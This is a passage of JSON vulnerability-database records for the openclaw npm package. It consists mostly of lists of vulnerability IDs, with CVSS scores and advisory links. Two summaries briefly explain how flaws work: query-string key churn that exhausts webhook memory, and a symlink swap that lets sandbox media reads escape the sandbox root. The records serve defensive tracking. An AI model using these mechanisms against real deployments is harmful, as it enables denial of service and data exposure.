},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-32048","GHSA-p7gr-f84w-hqg5"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-25jw-duqj-5fcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50503?format=json","vulnerability_id":"VCID-2gmm-t3a3-rqh9","summary":"OpenClaw has unbounded memory growth in Zalo webhook via query-string key churn (unauthenticated DoS)\nUnauthenticated requests to a reachable Zalo webhook endpoint could 
trigger unbounded in-memory key growth by varying query strings on the same valid webhook route.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32066","reference_id":"CVE-2026-32066","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32066"},{"reference_url":"https://github.com/advisories/GHSA-wr6m-jg37-68xh","reference_id":"GHSA-wr6m-jg37-68xh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wr6m-jg37-68xh"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wr6m-jg37-68xh","reference_id":"GHSA-wr6m-jg37-68xh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wr6m-jg37-68xh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vuln
erability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vuln
erability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vuln
erability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vuln
erability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vuln
erability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vuln
erability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vuln
erability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-32066","GHSA-wr6m-jg37-68xh"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2gmm-t3a3-rqh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50508?format=json","vulnerability_id":"VCID-93ka-ajkk-3keu","summary":"OpenClaw: Sandbox media TOCTOU could read files outside sandbox root\nSandbox media handling had a time-of-check/time-of-use gap: media paths could be validated first and read later through a separate path. 
A symlink retarget between those steps could cause reads outside `sandboxRoot`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-7xmq-g46g-f8pv","reference_id":"GHSA-7xmq-g46g-f8pv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7xmq-g46g-f8pv"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7xmq-g46g-f8pv","reference_id":"GHSA-7xmq-g46g-f8pv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7xmq-g46g-f8pv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp
-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc
-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnera